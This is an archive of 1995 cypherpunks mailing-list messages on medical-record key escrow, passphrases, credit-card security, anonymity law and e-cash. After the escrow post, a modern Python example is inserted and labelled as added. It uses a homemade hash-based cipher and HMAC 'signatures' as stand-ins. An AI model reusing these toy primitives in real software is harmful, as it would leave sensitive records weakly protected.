>board.  Two chips and some bypass capacitors.

Why not do both?  A Zener is supposed to be a relatively high-level source
of white noise, up to some upper bandwidth, so you could just feed the Zener
voltage (through a blocking cap, if necessary) to the radio receiver input.

See, you and the chip manufacturer are working at crossed purposes:  a radio
receiver chip is SUPPOSED to be a low-noise device.  For your purposes, you
WANT it to be a high-noise device, to minimize the significance of external
noise.  Since the radio receiver chip does some things you want (gain, maybe
AGC), but doesn't necessarily add an adequate amount of noise, a zener would
be an excellent addition.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Thomas M. Swiss" <tms@TIS.COM>
Date: Thu, 16 Nov 1995 04:32:34 +0800
To: cypherpunks@toad.com
Subject: Re: MED_vac
In-Reply-To: <199511151823.NAA02794@hidden-foes.gateway.com>
Message-ID: <199511152004.PAA05104@ziggy.tis.com>
MIME-Version: 1.0
Content-Type: text/plain



John Young <jya@pipeline.com> writes:
>
>   11-15-95. NYPaper Page One:
>
>   "When Patients' Records Are Commodities for Sale."
>
>      Individual medical records, carrying more sensitive
>      personal information than ever before, are increasingly
>      being gathered and stored by the tens of thousands in
>      commercial databanks maintained by institutions like
>      hospital networks, health maintenance organizations and
>      drug companies. And although there is a Federal law that
>      protects the privacy of video rental lists, private
>      medical information is being bought and sold freely.

     A (possibly stupid) thought: could commercial key escrow help here?

     I very much want hospitals to have fast access to my medical data if
my broken and bleeding body should come through their door, even if I am
unconscious and my personal physician cannot be reached. On the other hand,
I don't want anyone to be snooping through them right now.

     One solution is for me to carry my records around with me on a
smartcard or some such device. But there are problems with that approach;
for example, do I want that personal information to be in my wallet if it's
stolen? Do I want to add another item to the list of physical items I have
to keep secure?

     So, what if my records were available on the net, but encrypted with a
key known to my physician and an escrow agency? (Equivalently, they
could be on that smartcard, but encrypted.) If an emergency occurs, the
hospital fetches my encrypted records from my physician's server, then
sends a message (signed with the hospital's key) to Keys R Us, the escrow
agent, saying "This is Dr. McCoy at Frobnitz Memorial Hospital, we need the
key for FooBar Medix, Inc., patient number 147258369." (My FooBar Medix,
Inc., insurance card lists my physician's server, the escrow agency, and my
patient number.)  Keys R Us verifies the message and sends the key.
Perhaps there's also an alias to notify of the release, one that reports to
but is not traceable to my physician or me.

    Keys R Us only has a number and a key; they don't know who my physician
is and therefore don't know where to find the actual records.  Anyone who
gets my insurance card can find the records, but has to convince Keys R Us
to release the key; and if I've done my homework in picking the agency,
they won't.

     Does this give an advantage over just having a copy of my records kept
by a trusted third party? Maybe so; I think maybe less trust of the escrow
agency is necessary. No snooper can slip someone at the escrow agency a
couple of cyberbucks to get a copy of my records, unless they've managed to
match "FooBar Medix, Inc. patient number 147258369" with "Tom Swiss" and
the location of my physician's server. (What if FooBar Medix, Inc., lets
this information out? I dunno. I guess I visit their office with a
shotgun. Better idea: FMI doesn't know what escrow agency I use. I fill in
Keys R Us on the card myself.) No minimum wage slave can just casually
browse my records for fun.

     Thoughts?

     [Since TIS is in the CKE field, I should note that this is my own
boneheaded idea, not affiliated with the company in any way.]

-Tom Swiss / tms@tis.com 
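
The release flow sketched in the message above, as an added Python example that is not part of the original post. Assumptions: an HMAC under a key the hospital shares with the agent stands in for the hospital's signature, a hash-based encrypt-then-MAC construction stands in for the record cipher, and the server name, sample record and class names are constructed for illustration.

```python
import hashlib
import hmac
import json
import secrets

# Stand-ins built from the standard library so the example runs anywhere:
# seal/open_sealed replace a real AEAD (e.g. AES-GCM) and the HMAC "signature"
# replaces the hospital's public-key signature mentioned in the post.

def _keystream(key, nonce, length):
    out, counter = b"", 0
    while len(out) < length:
        out += hmac.new(key, nonce + counter.to_bytes(8, "big"), hashlib.sha256).digest()
        counter += 1
    return out[:length]

def _subkeys(key):
    return hashlib.sha256(b"enc" + key).digest(), hashlib.sha256(b"mac" + key).digest()

def seal(key, plaintext):
    """Encrypt-then-MAC; output is nonce || ciphertext || tag."""
    enc_key, mac_key = _subkeys(key)
    nonce = secrets.token_bytes(16)
    ct = bytes(p ^ k for p, k in zip(plaintext, _keystream(enc_key, nonce, len(plaintext))))
    return nonce + ct + hmac.new(mac_key, nonce + ct, hashlib.sha256).digest()

def open_sealed(key, blob):
    enc_key, mac_key = _subkeys(key)
    nonce, ct, tag = blob[:16], blob[16:-32], blob[-32:]
    expected = hmac.new(mac_key, nonce + ct, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("wrong key or tampered records")
    return bytes(c ^ k for c, k in zip(ct, _keystream(enc_key, nonce, len(ct))))

class PhysicianServer:
    """Holds ciphertext only, indexed by patient number; never holds the key."""
    def __init__(self):
        self._blobs = {}
    def store(self, patient_no, blob):
        self._blobs[patient_no] = blob
    def fetch(self, patient_no):
        return self._blobs[patient_no]

class EscrowAgent:
    """Holds (insurer, patient number) -> key; no names, no server location."""
    def __init__(self):
        self._keys = {}
        self._hospital_keys = {}
        self.release_log = []  # stands in for the notification alias
    def deposit(self, insurer, patient_no, key):
        self._keys[(insurer, patient_no)] = key
    def enroll_hospital(self, hospital, verify_key):
        self._hospital_keys[hospital] = verify_key
    def release(self, hospital, request, signature):
        # Verify the request before parsing or acting on any field in it.
        verify_key = self._hospital_keys.get(hospital)
        if verify_key is None or not hmac.compare_digest(
                signature, hmac.new(verify_key, request, hashlib.sha256).digest()):
            raise PermissionError("request not signed by an enrolled hospital")
        req = json.loads(request)
        key = self._keys.get((req["insurer"], req["patient_no"]))
        if key is None:
            raise LookupError("no key escrowed under that insurer and number")
        self.release_log.append((hospital, req["requester"], req["patient_no"]))
        return key

def emergency_access(card, hospital, requester, hospital_key, servers, agents):
    """Hospital side: fetch ciphertext, request the key, decrypt."""
    blob = servers[card["server"]].fetch(card["patient_no"])
    request = json.dumps({"requester": requester, "insurer": card["insurer"],
                          "patient_no": card["patient_no"]}, sort_keys=True).encode()
    signature = hmac.new(hospital_key, request, hashlib.sha256).digest()
    key = agents[card["escrow_agent"]].release(hospital, request, signature)
    return open_sealed(key, blob)

RECORDS = b"blood type O-; allergic to penicillin"  # constructed sample record

def build_scenario():
    """Set up the parties named in the post; returns (card, servers, agents, hospital_key)."""
    record_key = secrets.token_bytes(32)
    hospital_key = secrets.token_bytes(32)
    server = PhysicianServer()
    server.store("147258369", seal(record_key, RECORDS))
    agent = EscrowAgent()
    agent.deposit("FooBar Medix, Inc.", "147258369", record_key)
    agent.enroll_hospital("Frobnitz Memorial Hospital", hospital_key)
    card = {"insurer": "FooBar Medix, Inc.", "patient_no": "147258369",
            "server": "records.physician.example",  # constructed host name
            "escrow_agent": "Keys R Us"}
    return card, {card["server"]: server}, {card["escrow_agent"]: agent}, hospital_key

if __name__ == "__main__":
    card, servers, agents, hkey = build_scenario()
    print(emergency_access(card, "Frobnitz Memorial Hospital", "Dr. McCoy",
                           hkey, servers, agents))
    print(agents["Keys R Us"].release_log)
```
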





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Thu, 16 Nov 1995 08:41:23 +0800
To: cypherpunks@toad.com
Subject: Re: CSE gets flak on TV
Message-ID: <199511160021.QAA06782@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 14 Nov 1995, Mark C. Henderson wrote:

> On Nov 14, 16:47, s1113645@tesla.cc.uottawa.ca wrote:
>> Subject: CSE gets flak on TV
>> For those who care, the Communications Security Establishment has been
>> getting some flak for spying on Mex. during NAFTA talks and on Korea to
>> help us sell Can. nuke reactors:

The CSE deserves all the flak that it can get ... especially the village
idjit in "LMN Group", Barry de 'Artful.  Gee is he full of it.  His phone
manners are atrocious, especially for someone *supposedly* in customer
relations. 

I mean are these guys on their toes, or what??  I guess he was just trying
to do a bad Lily Tomlin impression, or they're having a really bad day
over there.  My mistake for demonstrating a willingness to talk.  It 
really was a waste of a quarter.

I guess that I'm not supposed to taunt the poor people at the CSE via
STU-III.  I guess I should have used POTS.  I mean Motorola's STU-III
can't be spoofed, can it??  Especially when we go into SECURE MODE?? 

(btw, that's STRIKE THREE to my Ottawa friends ...)

> Folks who are interested in the CSE should also check out the
> "unofficial CSE home page" at

Hmm, I think they misspelled some stuff on this page.  

It's STU-III ... not STY-III ... guess someone's finger slipped up on the
Y and the U, or something.  Then again, maybe we should be specing Alcatel
over Motorola.  Fewer chances for miscommunications. 

Or maybe Motorola has a couple of new products coming out. I'll bet
whatever they are, they ain't Marrons Glaces, or Beaujolais Villages. 



Alice de 'nonymous ...

                                  ...just another one of those...
                                                   ...hunters...

P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cassiel@alpha.c2.org (Cassiel)
Date: Thu, 16 Nov 1995 09:08:43 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199511160025.QAA08644@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Thanks for all who wrote with help re: FAQ file!  I now
have several other sources from which to download the
file.  Looks pretty interesting....

Cassiel






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: foodie@netcom.com
Date: Thu, 16 Nov 1995 09:16:09 +0800
To: cypherpunks@toad.com
Subject: Re: Repeated Words/characters in Password/Phrase
Message-ID: <v02130505acd00385c158@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


>In the real world, where passphrases must be memorized, "long and random"
>is an elusive goal, which has to be weighed against the risk of other
                     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
>attacks (such as capturing keystrokes with a software monitor, or from afar
 ^^^^^^^
>with a van Eck antenna, etc.).
>
>Me, I use a nonsense phrase which has meaning to me, with a few garbage
>characters added to confuse things further. I don't think my passphrase is
>the weak link.
>
>- --Tim May

This is, of course, very good advice.

Passphrases need only be as strong as every other component of the security
system. I'd add that there is a moderately good reason to keep the passphrase
_only_ as strong as every other component of the system for psychological
reasons.

The passphrase is what the user tends to think of when they think of their
system. Even if that user is the designer of the system, a false sense of
security can be an easy thing to develop. At a past place-of-work, someone
there who prided themselves on using difficult passphrases was bitten pretty
severely by a faulty .forward file.

DES provides similar lessons - searching 56 bits of keyspace requires just
barely less effort than that required to launch other attacks on the algorithm
(in theory, at least). The system is, as far as anybody knows, secure, and no
part of it is significantly more secure than any other.

-j

--
On the internet, nobody knows you're a diety.
_________________________________________________________________
Jamie Lawrence                                <foodie@netcom.com>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert A. Hettinga) (by way of rah@shipwright.com (RobertHettinga))
Date: Thu, 16 Nov 1995 06:22:22 +0800
To: www-buyinfo@allegra.att.com
Subject: Size of the internet economy?
Message-ID: <v02120d00acd0125e6d8b@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


Lately, I heard (somewhere) that $250 million changed hands directly on
the net in 1994, mostly credit cards.

Is this a real number? Where did it come from? What are estimates for 1995?

Cheers,
Bob Hettinga

--
Robert Hettinga <rah@shipwright.com>
e$
44 Farquhar Street
Boston 02131
617-958-3971
"Reality is not Optional" -- Thomas Sowell






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arley Carter <ac@hawk.twinds.com>
Date: Thu, 16 Nov 1995 06:48:13 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: credit card conventional wisdom
In-Reply-To: <199511151924.LAA29261@netcom13.netcom.com>
Message-ID: <Pine.HPP.3.91.951115165438.20268D-100000@hawk.twinds.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 15 Nov 1995, Vladimir Z. Nuri wrote:

> 
> Arley Carter <ac@hawk.twinds.com>
> 
> >This may be a stupidly obvious question but..... 
> >We could argue until the cows come home, hell freezes over or the Cubs win
> >the World Series, what ever comes first ;-) about whether giving your credit
> >card number to a waiter or an 800 # clerk is any more or less secure than
> >transmitting it encrypted or clear text over a data link.
> >
> 
> the point of my post was that I AGREE. the only issue is that we should
> make internet security as superior as possible regardless of the security
> of credit cards in the real world. I was attacking the line of thought
> that goes, "credit card security is already marginal, therefore why 
> should anyone try to improve it in cyberspace"? this is circular
> reasoning. "why should anyone try to make something more secure when
> it is already insecure?"
> 
In my post I am looking at this from an economics point of view. Simply
put: If there is unlimited liability to the credit card holder because
Mallet is stealing card numbers from the telco switch, encrypted, plain text,
it doesn't matter, there will be no users.  If there are no users then
there will be no transaction fees generated, no transaction fees, then it
won't be deployed.  Therefore, there is no reason to develop the code 
or even read the latest and greatest specs. and we are all wasting our 
time.  

We must recognize that no matter what code we write, how secure it is,
it won't be used until the banks that must clear the transactions
agree to accept the risks of loss in return for their transactions fees.
I haven't seen this from any of these consortiums and would like them, besides 
publishing their specs for the best system, to agree that this risk bearing
is a necessary step for electronic commerce to become a reality.

I would like to see members of the MasterCard and Visa coalitions comment 
on this aspect of the systems that they are promulgating.  The one who cracks
this nut first without losing their shirt to Mallet will be the winner. The
others that expect us to deploy systems based upon if Mallet breaks the 
system, the cardholder and/or merchant pays are wasting our time. 
MasterCard/Visa,  you're going to have to *earn* those transaction fees in
cyberspace.

From the card holder's point of view all he cares about is that he can't 
lose money from using his card.   

For anybody else that wants to argue about what is more dangerous,
restaurant dumpsters or telco switches, take it to alt.who.the.hell.cares.


Regards:
-arc

Arley Carter
Tradewinds Technologies, Inc.
email: ac@hawk.twinds.com
www: http://www.twinds.com

"Trust me. This is a secure product. I'm from <insert your favorite 
corporation or government agency>."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cassiel@alpha.c2.org (Cassiel)
Date: Thu, 16 Nov 1995 09:53:17 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199511160125.RAA02384@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Hi All

You were all so helpful with my last request, I figured
I would go for broke and ask for more advice.

The physical security of my computer isn't really that great,
so I've been interested in finding utilities that would 
securely delete the files I want deleted (as well as temp
files created, etc.).  I run Win 3.1 on DOS 6.  What do 
people think is the best free/shareware file wiping utility
(now, there's a Freudian name...) out there?  How about for
deleting that pesky Windows Swapfile?   I know--best of all
worlds I remain in DOS, but this isn't always practical.  Any
advice would be appreciated.

Please cc me directly in your response as I've moved over to
Cypherpunk-lite.

Thanks again!

Cassiel




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 16 Nov 1995 10:07:03 +0800
To: cypherpunks@toad.com
Subject: Anonymity and Intellectual Capital
Message-ID: <199511160148.RAA18908@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Here is a draft article by David Post of Georgetown Law Center.  He
offered it on the Cyberia list and it includes permission to
redistribute.  I thought it had some interesting ideas on anonymity and
pseudonymity, as well as our old bugaboo "reputation capital".  I have
reformatted it slightly to improve readability but made no changes to the
content:


Pooling Intellectual Capital: Anonymity, Pseudonymity, and Contingent
Identity in Cyberspace

DRAFT OUTLINE
October 31, 1995
David G. Post [NOTE 1]

	  Most discussions of "anonymity" in cyberspace focus on
whether or not to regulate the availability of "untraceably anonymous"
messaging functions -- anonymous remailer services and the like -- and
the related question of how, in the special circumstances of
cyberspace, one might accomplish such regulation.  To be sure, this is
an important perspective; although we are embedded in a world in which
anonymous transactions are pervasive, we have never before been able to
manipulate anonymity, or to undertake as wide a range of anonymous
transactions, as cyberspace allows us to undertake (and we have,
therefore, only begun to think about the implications of being able to
do so).  At the same time, however, the technology offers, it would
seem, new prospects for eliminating anonymous communication, i.e., for
requiring (and enforcing the requirement for) completely "traceable"
communication.

     We need, in the first instance, to understand more about the costs
and benefits of anonymity in this new environment before we can
sensibly talk about the best way to regulate it (or whether to regulate
it at all).  Harms associated with an anonymous messaging  regime
include, notably, the inability of "law enforcement" (broadly defined
to include both public and private enforcement) to obtain information
on persons responsible for harm perpetrated by individual actors;
benefits include the ability of individuals to engage in communicative
activity without putting any aspects of their "identity" at risk (see
below for additional discussion of the reasons for the quotation marks
here).

	  My thesis here is that, because of the close links
between anonymity and pseudonymity in cyberspace, new elements need to
be added to this equation -- primarily on the benefits side.  This
requires disentangling, at the outset, three related concepts:
anonymity, pseudonymity, and traceability.  We can define an
"anonymous" communication as one in which the message itself contains
(and hence the recipient of the message receives) no information
regarding the identity of the sender.[NOTE 2]  Although there can be
truly anonymous messages even in this strict sense -- messages
containing no information about the originator -- it makes more sense
to talk about anonymity as a continuous rather than a binary attribute
(present/absent) of messages:  even messages we ordinarily think of as
"anonymous," after all, contain some information about the author
(e.g., graffiti scrawled on a subway platform informs us that the
author was literate, and was geographically located in a certain place
within the last x months/years, all of which probably effects a
significant reduction in the reader's uncertainty about the identity of
the author by ruling out the vast majority of individuals in the world
as possible authors).

     Messages, however, rarely contain a fixed amount of information
about the sender's identity; [NOTE 3] the degree to which a message may
be considered "anonymous" is rarely (if ever) an inherent
characteristic of the message itself.  Relevant information about the
originator's identity may well often be available, but only at some
additional cost.  For example, an "anonymous" note slipped under the
door may be covered with fingerprints from which, were we able easily
to access both a fingerprint reader and the FBI's fingerprint database,
we could obtain significant information about likely originators.
"Traceability" measures the cost of obtaining information about the
identity of the sender in addition to the information that is "readily
apparent" -- i.e., obtainable at (virtually) no cost -- from the
message itself.[NOTE 4]

	  Finally, we can define a pseudonymous message as one
that contains information (of varying reliability, to be sure) about
the identity of the originator -- the cognizable entity responsible for
transmitting the message -- without simultaneously providing
information about the actual, biological, individuals responsible for
transmission of the message.  Pseudonymity, like anonymity, shields
aspects of the identity of the "real" actor from view; information that
a book was written by "Mark Twain" by itself gives you no more (or
less) information about the true identity of the author than does the
information that it was written by "Anon." Indeed, if Samuel Clemens
had chosen to publish each of his novels under a different pseudonym,
that would have been the essential equivalent of publishing all of the
novels under the pseudonym "Anon.," or "John Doe." Pseudonymity allows
each message to carry additional information, cumulative over time,
about the pseudonymous actor; i.e., the difference between pseudonymity
and anonymity is that the former, but not the latter, allows the
accumulation of reputational capital in the pseudonymous entity.  The
use of a single pseudonym "Mark Twain" allowed Clemens to invest a
single entity with reputational capital, built up over time and across
different novels; "Anon." will not serve that purpose, primarily (if
not exclusively) because it is unprotected and used by any number of
other authors (many of whom might not be quite as talented as
Clemens).[NOTE 5]

	  In other words, pseudonymity, like anonymity, allows
individuals to act without putting at risk any aspects of their own,
personal identity (including their physical assets, reputational
capital, financial capital, and the like); pseudonymity differs,
however, from anonymity in that it allows the accumulation of
reputational capital in the pseudonymous entity.  Both anonymity and
pseudonymity are thus forms of "limited liability," and the extent to
which they serve that function effectively is determined, in both
cases, by whatever traceability requirements are imposed.  To
illustrate, take the extreme case, e.g., a requirement that all
messages contain certain information about specified aspects of the
originator's "identity."  This would not only eliminate anonymous
messages (at least to the extent it could be enforced), but it would
make certain forms of pseudonymity effectively unavailable as well; the
reputational capital belonging to "Mark Twain" and to "Samuel Clemens"
would be identical, and whatever aspects of Clemens' identity had to be
revealed would no longer be shielded in the course of any transactions
in which "Mark Twain" was involved.

     Most discussions of "the regulation of anonymity in cyberspace"
are really discussions about traceability requirements.  The potential
benefits and harms that accompany an anonymous messaging regime are
directly related not to the availability of "anonymity" per se, but to
the availability of untraceable anonymity.  I know of no serious
proposals, for example, to prohibit individuals from leaving their
electronic mail messages unsigned; the hard questions all concern the
nature of the traceability requirements that will be put in place in
regard to those messages, i.e., how easy or difficult will it be for
the recipients of such messages, third parties, or law enforcement
officials, to obtain additional information about the identity of the
message originator.

	  But traceability requirements will have an impact --
possibly a profound impact -- not merely on the availability of
anonymous communication, but on the availability of pseudonymous
communication as well. For example, a sufficiently high degree of
traceability eliminates both anonymous and pseudonymous messages;
requiring all authors to provide information about their "real"
identity not only makes it impossible for them to communicate
anonymously, it is, in effect, impossible for them to communicate
pseudonymously as well.  Analyzing the consequences of a "ban on
anonymity" in cyberspace needs to take more than the benefits and costs
of anonymous messaging into account; it needs to be evaluated in light
of the benefits and costs of pseudonymous communication as well,
considerations that have received less attention from those looking at
these questions. So the question "what is the best traceability
requirement to apply to electronic communication" needs to consider not
only the harms and benefits flowing from anonymous communication but
these additional considerations as well.

	  Because all communication in cyberspace is entirely
machine-mediated -- i.e., because the "identity" of the relevant actors
in a biological sense is necessarily at one remove from the
communication itself -- everyone acts "pseudonymously," at least in the
sense that you can only be identified by a stream of bits when you act
in cyberspace [NOTE 6].  The prospect for more creative uses of
pseudonymous action -- the ability for individuals to pool their
individual intellectual capital with great flexibility and with very
low start-up or transactions costs, into a wide range of new kinds of
actors and entities, each capable of accumulating reputational capital
-- is a profound and exciting feature of this environment.[NOTE 7]

	       The "limited liability" metaphor now becomes a bit
more useful.  Just as limited liability in the corporate context was
designed to encourage the pooling of physical and financial assets into
corporate entities, assuring investors that their personal assets would
not be placed at risk, so, too, should protection against traceability
(i.e., protection for pseudonymous action) encourage "investors" to
pool their intellectual capital into pseudonymous entities, assuring
those investors that only the reputation of the pseudonymous actor, and
not their own personal assets, is at risk when the entity acts.

     This approach probably answers none of the hard questions about
the proper scope of regulation; it may, hopefully, lead to a
consideration of those questions that need to be answered before any
regulatory actions are undertaken.  If there are benefits to be gained
from the actions of these entities -- if the pooling of intellectual
capital into entities leads to new and valuable forms of intellectual
undertakings (itself a question open to discussion) -- we should seek
to design our rules of limited liability to simultaneously induce
"investors" to form these new entities while minimizing the costs that
may be associated with their formation.  Analyses of corporate limited
liability are useful analogues for this inquiry; when should "piercing
the veil" of pseudonymity be permitted or required? Can we disaggregate
the various aspects of personal identity that should receive more, or
less, protection from disclosure?

************************************************

NOTES.

	  1.   Visiting Associate Professor of Law, Georgetown
University Law Center, and Co-director, Cyberspace Law Institute.
Email:  Postd@law.georgetown.edu or DPostn00@counsel.com.  Permission
is hereby granted to freely copy and distribute this paper; please
retain the "Draft" designation as well as attribution to the author.

	  2.   I use "information" in the information-theoretic
sense, in which information is measured as a reduction in uncertainty;
that is, a message that contains information about the identity of the
sender is one that, by definition, lowers the recipient's uncertainty
concerning the identity of the sender.

	  3.   "Identity," of course, is not a static,
context-less piece of information, but is, rather, a complex cluster of
characteristics attributable to an individual, subsets of which may be
more or less relevant in particular contexts (and information about
which may be differentially transmitted in particular messages).
Consider the graffiti again -- even assuming that this may be an
"untraceable" message, in what sense is it an "anonymous" one?  The
reader may obtain a great deal of information relevant to (certain
aspects of) the originator's "identity" -- information about the
originator's political views, perhaps, or familiarity with certain
historical events.  On the other hand, the original message provides no
information (i.e., it is "anonymous") with regard to the originator's
state of domicile (or where the originator went to school, or how many
children the originator may have -- all attributes relevant, in other
contexts, to the question of the originator's "identity").

	  And while we ordinarily think of "identity" in the
context of individual biological persons, that is far too restrictive a
view.  Consider my receipt of an (unsigned) notice from the Department
of Motor Vehicles, or an (unsigned) advertising flyer from my local
McDonald's restaurant.  Each of these messages is "anonymous" in one
sense: I obtain virtually no information about the "identity" of the
(biologically-relevant) individual who typed the notice or otherwise
caused it to be transmitted to me (if indeed there is any such
person).  But it is hardly anonymous in another (and probably more
significant) sense: the letterhead clearly identifies the "identity" of
the more relevant actor (the DMV or McDonald's).  The relevant actor
here, i.e. the DMV or McDonald's, has a reality unconnected with the
physical "identity" of any of its individual constituents (employees,
officers, etc.); indeed, a notice from the DMV that is mistakenly
placed on non-letterhead stationery (but that is signed by the typist)
surely has less reliable information about the originator's "identity"
than the reverse (i.e., an unsigned note placed on DMV letterhead).

	  4.   Traceability itself is highly context-dependent,
insofar as both the cost of obtaining additional identification
information, and the value of that information in reducing uncertainty
regarding identity, will vary, possibly greatly, from one situation to
another.  It may, for example, be relatively easy for a law enforcement
official to obtain information regarding the identity of the individual
who placed a particular phone call; the same information may be
prohibitively difficult for other individuals to obtain.  Traceability
is also affected by (1) whether or not relevant identification
information exists in the hands of third parties (i.e., parties other
than the originator and recipient), (2) the third party's duty (or lack
of a duty) to keep the information secret, and (3) the ease with which
disclosure can be legally compelled (by process, subpoena, etc.).

     5.   Anonymity can thus be regarded as a subset of pseudonymity,
with the critical difference being, for my purposes at least, that
pseudonymity allows the accretion of reputational capital in the
pseudonym.

	  6.   This stream may have a high degree of traceability
-- if my electronic mail address is "Postd@law.georgetown.edu," for
example, there at least appears to be information allowing the message
to be traced to a real individual (though query, as always, how
reliable that information may be).  Or it may not -- the use of a
screen name on America Online, or, in the extreme, the use of anonymous
remailers.

	  7.   Examples: the Cancelmoose; the Cyberspace Law
Institute.

     8.   I use "regulation" in the broad sense, to include not only
State action but the "regulatory" activities of e.g., individual system
operators.

	  9.   Note, in this regard, that protecting the "limited
liability" features of pseudonymity does not necessarily mean that
harms imposed on third parties by pseudonymous entities must go
unredressed (as is the consequence of limited liability in the
corporate context); because reputational capital is not transferable,
i.e., is not useful for the purpose of compensating victims of harms
perpetrated by pseudonymous entities, redress can be achieved by
exposing individuals' financial assets, though not necessarily their
personal identities, to risk when the pseudonymous entity acts, and
there are various insurance and authentication/certification regimes
that I will discuss to accomplish this.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Thu, 16 Nov 1995 10:45:31 +0800
To: cypherpunks@toad.com
Subject: Re: credit card conventional wisdom (fwd)
Message-ID: <Pine.SOL.3.91.951115182044.18955B-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain




Date: Wed, 15 Nov 1995 18:07:25 -0800
From: Tom Wills <twills@eit.COM>
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: credit card conventional wisdom (fwd)

The printed digits above the embossed account number are the first four
digits of the BIN (on Visa cards) or ICA (on MasterCards). They are there
to discourage re-embossing of the card with another account number.

Original Message:

>
>Wow, you learn something every day. I've never in
>my whole life (well, my American Express life,
>over 15 years) noticed those four digits. I've
>never been asked for them by anyone, or noticed
>them being written down, either. Exactly when and
>how are they used?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Thu, 16 Nov 1995 10:58:55 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape rewards are an insult
In-Reply-To: <199511151019.CAA18910@jobe.shell.portal.com>
Message-ID: <30AAA306.64CF@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Dr. Frederick B. Cohen wrote:
> On a closely related vein, Sun has announced that they are severely
> limiting some functions in HotJava - from Risks-17-45:

[ excerpts from Sun announcement deleted ]

> I had a rather lengthy discussion with a gentleman from Sun at the CSI
> conference last Tuesday night, and this announcement follows many of the
> things we discussed very closely.  This kind of consistency between what
> people say and what the company published is refreshing, and it restores
> my faith in Sun's desire to do things well.  Of course there are still
> some problems left unresolved:

[ more of Sun announcement deleted ]

> I do think that this response by Sun, regardless of the technical merits
> of the particulars, demonstrates a desire to improve protection and a
> willingness to listen.  My compliments for that.

All of these security measures are implemented by Netscape in the
current release.  Specifically, Netscape Navigator 2.0beta2
includes all the applet security precautions detailed in the recent
comp.lang.java posting.  Netscape has been shipping the fixed
applet security model for over a month (since 2.0Beta1), and
Netscape and Sun continue to cooperate and work closely on applet
security issues.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Peter F Cassidy <pcassidy@world.std.com>
Date: Thu, 16 Nov 1995 07:57:25 +0800
To: "Robert A. Hettinga" <rah@shipwright.com>
Subject: Re: Size of the internet economy?
In-Reply-To: <v02120d00acd0125e6d8b@[199.0.65.105]>
Message-ID: <Pine.3.89.9511151811.C19718-0100000@world.std.com>
MIME-Version: 1.0
Content-Type: text/plain





On Wed, 15 Nov 1995, Robert A. Hettinga wrote:

> Lately, I heard (somewhere) that $250 million changed hands directly on
> the net in 1994, mostly credit cards.
>
> Is this a real number? Where did it come from? What are estimates for 1995?
>

Everything on the net is outside of a lot of traditional metrics and hard to
authenticate even if it were simple to measure. Forrester cites 250 million
retail and $90 million in content revenues. By contrast, guys selling a piece
of pipe raked in $1.5 billion.

Activmedia - www.activmedia.com - does regular surveys. I just got a 
breathless press release for their latest one - "WEB COMMERCE UP 1900%." 
Someone must have bought tickets to the latest George Foreman comeback fight
or something from a ticketron on-line kiosk. . . 

Ole,

Peter

> 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Thu, 16 Nov 1995 11:09:14 +0800
To: cypherpunks@toad.com
Subject: Re: credit card conventional wisdom (fwd)
In-Reply-To: <Pine.SOL.3.91.951115182044.18955B-100000@chivalry>
Message-ID: <Pine.SOL.3.91.951115184015.18971A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain



Further info:

  The AMEX digits aren't part of the standard info- someone I spoke to 
who started off as a grey box programmer said that he thought they were 
just process control. 

  Card-present/Card-not-present can be determined from info on the 
magnetic stripe; for visa cards, this info is stored in a three-digit 
checksum at the end of the discretionary info.

Card Imprints taken with no online authorisation are typically charged a 
transaction fee of 3-6%: with authorisation, 1.5-3%.  ATM card 
transactions  are charged at around $0.10 per transaction.


Simon




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Thu, 16 Nov 1995 22:30:00 +0800
To: cypherpunks@toad.com
Subject: e$: Come aaaannnndddd Get it!
Message-ID: <v02120d05acd0346e6c23@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


I'm in the process of scrambling to get the e$ web page set up for e-cash
before the deadline for *no-fee* *commercial* accounts at Mark Twain Bank
this Friday, and who should answer the mail but fellow cypherpunk Lucky
Green.

So, Lucky tells me that *he's* the guy who beat up Chaum/MTB and Co. to
prime the pump for web-vendors by offering *free* signup for e-cash
accounts.  Muchos Kudos to Lucky for making that happen.

